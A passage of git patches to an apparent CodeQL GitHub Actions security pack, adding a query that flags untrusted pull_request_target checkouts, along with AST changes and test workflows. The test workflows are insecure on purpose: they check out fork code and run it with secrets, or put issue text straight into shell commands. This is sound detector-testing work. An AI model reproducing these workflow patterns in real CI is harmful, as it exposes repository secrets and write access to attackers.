--- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml +++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint"] diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml index 0c283016c86..18297709838 100644 --- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml +++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint"] diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml index 2694ec2c453..3db3e9cf66c 100644 --- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml +++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint"] diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml index aee6172b591..0190ffd9ad7 100644 --- a/ql/lib/ext/ruby_setup-ruby.model.yml +++ b/ql/lib/ext/ruby_setup-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint"] diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml index 2167b16c7ba..87610c43440 100644 --- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml +++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint"] diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml index d90d7109fc2..a8db7e8313e 100644 --- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index 20a412fd9b7..d171499049a 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 8d0731c9792..4ab448b04c1 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index 9364fd74752..299c387c81a 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: summaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint"] - - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"] \ No newline at end of file + - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index f16b69c7af9..6ce7dd68b3f 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "pull_request_target", ""] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 59a4c5b5652..72df42535db 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: codeql/actions-all + pack: githubsecuritylab/actions-all extensible: sourceModel data: - ["xt0rted/slash-command-action", "*", "output.command-arguments", "issue_comment", ""] From ecefb7ffb57aaf1e82293143dcd5a29397a62415 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 22 Feb 2024 13:12:37 +0100 Subject: [PATCH 0070/1267] feat(untrusted checkout query): Add new query and tests --- ql/lib/codeql/actions/Ast.qll | 24 ++++++++-- ql/src/Security/CWE-094/UntrustedCheckout.ql | 47 +++++++++++++++++++ .../workflows/actor_trusted_checkout.yml | 26 ++++++++++ .../workflows/label_trusted_checkout.yml | 27 +++++++++++ .../.github/workflows/untrusted_checkout.yml | 25 ++++++++++ 5 files changed, 146 insertions(+), 3 deletions(-) create mode 100644 ql/src/Security/CWE-094/UntrustedCheckout.ql create mode 100644 ql/src/test/.github/workflows/actor_trusted_checkout.yml create mode 100644 ql/src/test/.github/workflows/label_trusted_checkout.yml create mode 100644 ql/src/test/.github/workflows/untrusted_checkout.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8f04005be8f..339daf5365e 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -22,9 +22,7 @@ class AstNode instanceof YamlNode { */ class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ - WorkflowStmt getEnclosingWorkflowStmt() { - this = result.getAChildNode*() - } + WorkflowStmt getEnclosingWorkflowStmt() { this = result.getAChildNode*() } } /** @@ -174,6 +172,8 @@ class JobStmt extends Statement instanceof Actions::Job { predicate usesReusableWorkflow() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) } + + IfStmt getIfStmt() { result = super.getIf() } } /** @@ -183,6 +183,24 @@ class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } JobStmt getJobStmt() { result = super.getJob() } + + IfStmt getIfStmt() { result = super.getIf() } +} + +/** + * An If node representing a conditional statement. + */ +class IfStmt extends Statement { + YamlMapping parent; + + IfStmt() { + (parent instanceof Actions::Step or parent instanceof Actions::Job) and + parent.lookup("if") = this + } + + Statement getEnclosingStatement() { result = parent } + + string getCondition() { result = this.(YamlScalar).getValue() } } /** diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql new file mode 100644 index 00000000000..4187e045c9b --- /dev/null +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql @@ -0,0 +1,47 @@ +/** + * @name Checkout of untrusted code in trusted context + * @description Workflows triggered on `pull_request_target` have read/write access to the base repository and access to secrets. + * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment + * that is able to push to the base repository and to access secrets. + * @kind problem + * @problem.severity warning + * @precision low + * @id actions/pull-request-target + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions + +/** + * An If node that contains an `actor` check + */ +class ActorCheckStmt extends IfStmt { + ActorCheckStmt() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") } +} + +/** + * An If node that contains a `label` check + */ +class LabelCheckStmt extends IfStmt { + LabelCheckStmt() { this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") } +} + +from WorkflowStmt w, JobStmt job, StepUsesExpr checkoutStep +where + w.hasTriggerEvent("pull_request_target") and + w.getAJobStmt() = job and + job.getAStepStmt() = checkoutStep and + checkoutStep.getCallee() = "actions/checkout" and + checkoutStep + .getArgumentExpr("ref") + .(ExprAccessExpr) + .getExpression() + .matches([ + "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%", + "%github.event.pull_request.number%", "%github.event.number%", "%github.head_ref%" + ]) and + not exists(ActorCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) and + not exists(LabelCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) +select checkoutStep, "Potential unsafe checkout of untrusted pull request on 'pull_request_target'." diff --git a/ql/src/test/.github/workflows/actor_trusted_checkout.yml b/ql/src/test/.github/workflows/actor_trusted_checkout.yml new file mode 100644 index 00000000000..08a25646d6a --- /dev/null +++ b/ql/src/test/.github/workflows/actor_trusted_checkout.yml @@ -0,0 +1,26 @@ +on: + pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + if: ${{ github.actor == "admin" }} + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/ql/src/test/.github/workflows/label_trusted_checkout.yml b/ql/src/test/.github/workflows/label_trusted_checkout.yml new file mode 100644 index 00000000000..56bb143cf36 --- /dev/null +++ b/ql/src/test/.github/workflows/label_trusted_checkout.yml @@ -0,0 +1,27 @@ +on: + pull_request_target: + types: [labeled] + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/ql/src/test/.github/workflows/untrusted_checkout.yml b/ql/src/test/.github/workflows/untrusted_checkout.yml new file mode 100644 index 00000000000..a37ceb8f9f6 --- /dev/null +++ b/ql/src/test/.github/workflows/untrusted_checkout.yml @@ -0,0 +1,25 @@ +on: + pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! From 68f15f2b85c24f38b1290ed70b8ae8e98d415ab3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 22 Feb 2024 13:14:53 +0100 Subject: [PATCH 0071/1267] rename query id --- ql/src/Security/CWE-094/UntrustedCheckout.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql index 4187e045c9b..25d05f1b7c2 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql @@ -6,7 +6,7 @@ * @kind problem * @problem.severity warning * @precision low - * @id actions/pull-request-target + * @id actions/untrusted-checkout * @tags actions * security * external/cwe/cwe-094 From f513a19c243bbd4c0c82ce3d9714078fc3dfed0f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 23 Feb 2024 11:53:47 +0100 Subject: [PATCH 0072/1267] fix: restrict EnvCtxAccessExpr to Env decarlations on the same file --- ql/lib/codeql/actions/Ast.qll | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 339daf5365e..68469ef2467 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -500,15 +500,10 @@ class InputsCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } override Expression getRefExpr() { - exists(ReusableWorkflowStmt w | - w.getLocation().getFile() = this.getLocation().getFile() and - w.getInputsStmt().getInputExpr(fieldName) = result - ) + result.getLocation().getFile() = this.getLocation().getFile() and + exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(fieldName) = result) or - exists(CompositeActionStmt a | - a.getLocation().getFile() = this.getLocation().getFile() and - a.getInputsStmt().getInputExpr(fieldName) = result - ) + exists(CompositeActionStmt a | a.getInputsStmt().getInputExpr(fieldName) = result) } } @@ -528,6 +523,7 @@ class EnvCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } override Expression getRefExpr() { + result.getLocation().getFile() = this.getLocation().getFile() and exists(JobUsesExpr s | s.getEnvExpr(fieldName) = result) or exists(StepUsesExpr s | s.getEnvExpr(fieldName) = result) From 645177cc8083e2d6f249ec1feaba5b8d9687ef9e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 26 Feb 2024 09:39:42 +0100 Subject: [PATCH 0073/1267] Account for github.event.label check as a sanitizer for untrusted checkout --- ql/src/Security/CWE-094/UntrustedCheckout.ql | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-094/UntrustedCheckout.ql b/ql/src/Security/CWE-094/UntrustedCheckout.ql index 25d05f1b7c2..9c9b5f9eb26 100644 --- a/ql/src/Security/CWE-094/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-094/UntrustedCheckout.ql @@ -25,7 +25,10 @@ class ActorCheckStmt extends IfStmt { * An If node that contains a `label` check */ class LabelCheckStmt extends IfStmt { - LabelCheckStmt() { this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") } + LabelCheckStmt() { + this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or + this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") + } } from WorkflowStmt w, JobStmt job, StepUsesExpr checkoutStep From 98f3a1e7bf03d725889d4b0cdd3a9a066380424b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 26 Feb 2024 10:43:55 +0100 Subject: [PATCH 0074/1267] fix(env): Improve env access support --- ql/lib/codeql/actions/Ast.qll | 84 +++--------- ql/src/test/.github/workflows/cross1.yml | 160 +++++++++++++++++++++++ ql/src/test/.github/workflows/cross2.yml | 109 +++++++++++++++ ql/src/test/.github/workflows/cross3.yml | 67 ++++++++++ 4 files changed, 355 insertions(+), 65 deletions(-) create mode 100644 ql/src/test/.github/workflows/cross1.yml create mode 100644 ql/src/test/.github/workflows/cross2.yml create mode 100644 ql/src/test/.github/workflows/cross3.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 68469ef2467..fd66acf530d 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -23,6 +23,21 @@ class AstNode instanceof YamlNode { class Statement extends AstNode { /** Gets the workflow that this job is a part of. */ WorkflowStmt getEnclosingWorkflowStmt() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current step. + */ + Expression getEnvExpr(string name) { + exists(Actions::Env env | + env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + | + env.(Actions::StepEnv).getStep().getAChildNode*() = this + or + env.(Actions::JobEnv).getJob().getAChildNode*() = this + or + env.(Actions::WorkflowEnv).getWorkflow().getAChildNode*() = this + ) + } } /** @@ -212,8 +227,6 @@ abstract class UsesExpr extends Expression { abstract string getVersion(); abstract Expression getArgumentExpr(string key); - - abstract Expression getEnvExpr(string name); } /** @@ -234,26 +247,6 @@ class StepUsesExpr extends StepStmt, UsesExpr { result = with.lookup(key) ) } - - /** - * Gets a environment variable expression by name in the scope of the current step. - */ - override Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** @@ -302,23 +295,6 @@ class JobUsesExpr extends UsesExpr instanceof YamlMapping { override Expression getArgumentExpr(string key) { this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } - - /** - * Gets a environment variable expression by name in the scope of the current node. - */ - override Expression getEnvExpr(string name) { - this.(YamlMapping).lookup("env").(YamlMapping).lookup(name) = result - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** @@ -332,26 +308,6 @@ class RunExpr extends StepStmt, Expression { Expression getScriptExpr() { result = scriptExpr } string getScript() { result = scriptExpr.getValue() } - - /** - * Gets a environment variable expression by name in the scope of the current node. - */ - Expression getEnvExpr(string name) { - exists(Actions::StepEnv env | - env.getStep() = this and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::JobEnv env | - env.getJob() = this.getJobStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - or - exists(Actions::WorkflowEnv env | - env.getWorkflow() = this.getJobStmt().getEnclosingWorkflowStmt() and - env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) - ) - } } /** @@ -523,11 +479,9 @@ class EnvCtxAccessExpr extends CtxAccessExpr { override string getFieldName() { result = fieldName } override Expression getRefExpr() { - result.getLocation().getFile() = this.getLocation().getFile() and - exists(JobUsesExpr s | s.getEnvExpr(fieldName) = result) - or - exists(StepUsesExpr s | s.getEnvExpr(fieldName) = result) - or - exists(RunExpr s | s.getEnvExpr(fieldName) = result) + exists(Statement s | + s.getEnvExpr(fieldName) = result and + s.getAChildNode*() = this + ) } } diff --git a/ql/src/test/.github/workflows/cross1.yml b/ql/src/test/.github/workflows/cross1.yml new file mode 100644 index 00000000000..9927aca8c56 --- /dev/null +++ b/ql/src/test/.github/workflows/cross1.yml @@ -0,0 +1,160 @@ +# Issues_workflow.yaml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/Issues_workflow.yaml#L128-L128) +name: Issue Workflow +on: + issues: + types: [opened,edited] +jobs: + #This job will check the issue to determine if it should be moved to a different repository + redirectIssue: + name: Check for issue transfer + runs-on: ubuntu-latest + env: + #The 'content_analysis_response' variable is used to store the script response on step one, + #and then checked on step two to know if adding any labels is necessary. + #The initial 'undefined' value will be overridden when the script runs. + content_analysis_response: undefined + ISSUE_TITLE: ${{github.event.issue.title}} + ISSUE_BODY: ${{github.event.issue.body}} + outputs: + result: ${{env.content_analysis_response}} + steps: + - uses: actions/checkout@v4 + + #Detect if the issue_title follows the regex expression + - name: Check Issue Title + uses: actions-ecosystem/action-regex-match@v2 + id: regex-match + with: + text: ${{github.event.issue.title}} + regex: '^[A-Za-z0-9 _.]*$' + flags: g + + #If the regex output is '' means that the issue title contains special chars + - name: Exit Job + if: ${{ steps.regex-match.outputs.match == '' }} + run: | + echo "Bad Issue Title Format" + exit 1 + + #Remove the " character in the issue title and replaced with - + - name: Remove conflicting chars + uses: frabert/replace-string-action@v2.5 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_TITLE}} + replace-with: '-' + flags: g + + #According to the issue_title returns a specific label + - name: Check Information + id: check-info + env: + ISSUE_TITLE_PARSED: ${{steps.remove_quotations.outputs.replaced}} + run: | + echo "content_analysis_response=$(pwsh .\\.github\\scripts\\title_analyzer.ps1)" >> $GITHUB_ENV + + #labels the issue based in the text returned in content_analysis_response var + - name: Label issue + if: env.content_analysis_response != 'Valid' + #Uses DYNAMOBOTTOKEN to allow interaction between repos + run: | + curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labels + + #This job will scan the issue content to determing if more information is needed and act acordingly + #Will only run if the "redirectIssue" job outputted a 'Valid' result + checkIssueInformation: + if: needs.redirectIssue.outputs.result == 'Valid' + name: Check for missing information + #Wait for the previous job to finish as it needs its output + needs: redirectIssue + runs-on: ubuntu-latest + env: + #The 'analysis_response' variable is used to store the script response on step one, + #and then checked on step two to know if adding the label and comment is necessary. + #The initial 'undefined' value will be overridden when the script runs. + analysis_response: undefined + #Greetings for valid issues + greetings_comment: "Thank you for submitting the issue to us. We are sorry to + see you get stuck with your workflow. While waiting for our team member to respond, + please feel free to browse our forum at https://forum.dynamobim.com/ for more Dynamo related information." + #Comment intro + comment_intro: "Hello ${{ github.actor }}, thank you for submitting this issue! + We are super excited that you want to help us make Dynamo all that it can be." + #issue_coment holds the comment format, while the missing information will be provided by analysis_response + needs_more_info_comment: "However, we need some more information in order for the Dynamo + team to investigate any further.\\n\\n" + #comment to be used if the issue is closed due to the template being empty + close_issue_comment: "However, given that there has been no additional information added, + this issue will be closed for now. Please reopen and provide additional + information if you wish the Dynamo team to investigate further.\\n\\n" + #Info asked from the user in bot comments + info_needed: "Additional information:\\n + - Filling in of the provided Template (What did you do, What did you expect to see, + What did you see instead, What packages or external references (if any) were used)\\n + - Attaching the Stack Trace (Error message that shows up when Dynamo crashes - You can copy and paste this into the Github Issue)\\n + - Upload a .DYN file that showcases the issue in action and any additional needed files, such as Revit + (Note: If you cannot share a project, you can recreate this in a quick mock-up file)\\n + - Upload a Screenshot of the error messages you see (Hover over the offending node and showcase + said errors message in the screenshot)\\n + - Reproducible steps on how to create the error in question." + #Text to ask for specific missing information (complemented by the analysis response) + specific_info: "Can you please fill in the following to the best of your ability:" + #template file name + template: "ISSUE_TEMPLATE.md" + #label to tag the issue with if its missing information + issue_label: needs more info + #amount of sections from the template that can be missing information for the issue to still be considered complete + acceptable_missing_info: 1 + steps: + #Checkout the repo + - uses: actions/checkout@v4 + + #Removes conflicting characters before using the issue content as a script parameter + - name: Remove conflicting chars + env: + ISSUE_BODY: ${{github.event.issue.body}} + uses: frabert/replace-string-action@v2.5 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_BODY}} + replace-with: '-' + flags: g + + #Checks for missing information inside the issue content + - name: Check Information + id: check-info + env: + ISSUE_BODY: ${{ steps.remove_quotations.outputs.replaced }} + run: | + echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENV + + #Closes the issue if the analysis response is "Empty" + - name: Close issue + if: env.analysis_response == 'Empty' + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }} + + #Adds the "needs more info" label if needed + - name: Label and comment issue + if: ((env.analysis_response != 'Valid') && (env.analysis_response != 'Empty') && (github.event.action == 'opened')) + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labels + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments + + #Removes the "needs more info" label if the issue has the missing information + - name: Unlabel updated issue + if: env.analysis_response == 'Valid' && github.event.action == 'edited' + run: | + echo urldecode ${{env.issue_label}} + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g') + + #Adds greetings message + - name: Greetings + if: env.analysis_response == 'Valid' && github.event.action == 'opened' + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/comments + + diff --git a/ql/src/test/.github/workflows/cross2.yml b/ql/src/test/.github/workflows/cross2.yml new file mode 100644 index 00000000000..ae24e21560b --- /dev/null +++ b/ql/src/test/.github/workflows/cross2.yml @@ -0,0 +1,109 @@ +# issue_type_predicter.yml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/issue_type_predicter.yml#L40-L40) +name: Issue Type Predicter +# This workflow uses https://github.com/DynamoDS/IssuesTypePredicter to predict the type of a github issue + +on: + issues: + types: [opened, edited] + +jobs: + issue_type_Predicter: + name: Issue Type Predicter + runs-on: ubuntu-latest + env: + # The 'analysis_response' variable is used to store the response returned by issue_analyzer.ps1 + # The initial 'undefined' value will be overridden when the script runs + analysis_response: undefined + # The 'parsed_issue_body' variable is used to store the parsed issue body (after removing some sections of the body like Stack Trace) + parsed_issue_body: undefined + # The 'issue_json_string' variable is used to store parsed info of the issue body as a json string + issue_json_string: undefined + # The 'is_wish_list' variable is used to store the value returned by the IssuesTypePredicter project + is_wish_list: undefined + # issue template file name + template: "ISSUE_TEMPLATE.md" + # amount of sections from the template that can be missing information for the issue to still be considered valid + acceptable_missing_info: 1 + + steps: + # Checkout Dynamo repo + - name: Checkout Dynamo Repo + uses: actions/checkout@v4 + + # Removes quotes before using the issue content as a script parameter + - name: Remove Quotes + id: remove_quotes + uses: frabert/replace-string-action@v2.5 + env: + ISSUE_BODY: ${{ github.event.issue.body }} + with: + pattern: "\"" + string: ${{ env.ISSUE_BODY }} + replace-with: '-' + + # Analyze for missing information inside the issue content + - name: Analyze Issue Body + env: + ISSUE_BODY: ${{ steps.remove_quotes.outputs.replaced }} + run: | + echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" >> $GITHUB_ENV + + # Remove sections in the issue body like "Dynamo version", "Stack Trace" because won't be used to predict the issue type + - name: Clean Issue Body + if: env.analysis_response == 'Valid' + env: + ISSUE_BODY_PARSED: ${{ steps.remove_quotes.outputs.replaced }} + run: | + echo "parsed_issue_body="$(pwsh .\\.github\\scripts\\issue_body_cleaner.ps1 )"" >> $GITHUB_ENV + + # Create json string from the issue body + - name: Create Issue JSON String + if: env.analysis_response == 'Valid' + env: + ISSUE_NUMBER: ${{ github.event.issue.number }} + ISSUE_TITLE: ${{ github.event.issue.title }} + run: | + echo "issue_json_string="$(pwsh .\\.github\\scripts\\get_issue_json_body.ps1 "$ISSUE_NUMBER")"" >> $GITHUB_ENV + + # Checkout the IssuesTypePredicter repo (https://github.com/DynamoDS/IssuesTypePredicter) + - name: Checkout IssuesTypePredicter Repo + if: env.analysis_response == 'Valid' + uses: actions/checkout@v4 + with: + repository: DynamoDS/IssuesTypePredicter + path: IssuesTypePredicter + + # Setup dotnet + - name: Setup dotnet + uses: actions/setup-dotnet@v4 + with: + dotnet-version: '3.1.0' + + # Build the solution IssuesTypePredicter.sln (this contains two VS2019 ML.NET projects) + - name: Build Issues Type Predicter + if: env.analysis_response == 'Valid' + run: | + dotnet build ./IssuesTypePredicter/IssuesTypePredicter.sln --configuration Release + cp ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/bin/Release/netcoreapp3.1/MLModel.zip . + + # Execute the IssuesTypePredicter program and pass 'issue_json_string' as a parameter + - name: Run Issues Type Predicter + if: env.analysis_response == 'Valid' + run: | + echo "is_wish_list="$(dotnet run -p ./IssuesTypePredicter/IssuesTypePredicterML.ConsoleApp/IssuesTypePredicterML.ConsoleApp.csproj -v q "${{ env.issue_json_string }}")"" >> $GITHUB_ENV + + # If the is_wish_list variable contains 1, label the issue as "Wishlist" + - name: Label issue as 'Wishlist' + if: env.analysis_response == 'Valid' && contains(env.is_wish_list, 'IsWishlist:1') + env: + GH_TOKEN: ${{ secrets.DYNAMO_ISSUES_TOKEN }} + run: | + gh issue edit ${{ github.event.issue.number }} --add-label "Wishlist" --repo ${{ github.repository }} + + # If the issue is missing important information (don't follow the template structure), label the issue as "NotMLEvaluated" + - name: Label issue as 'NotMLEvaluated' + if: env.analysis_response != 'Valid' || env.issue_json_string == '' + env: + GH_TOKEN: ${{ secrets.DYNAMO_ISSUES_TOKEN }} + 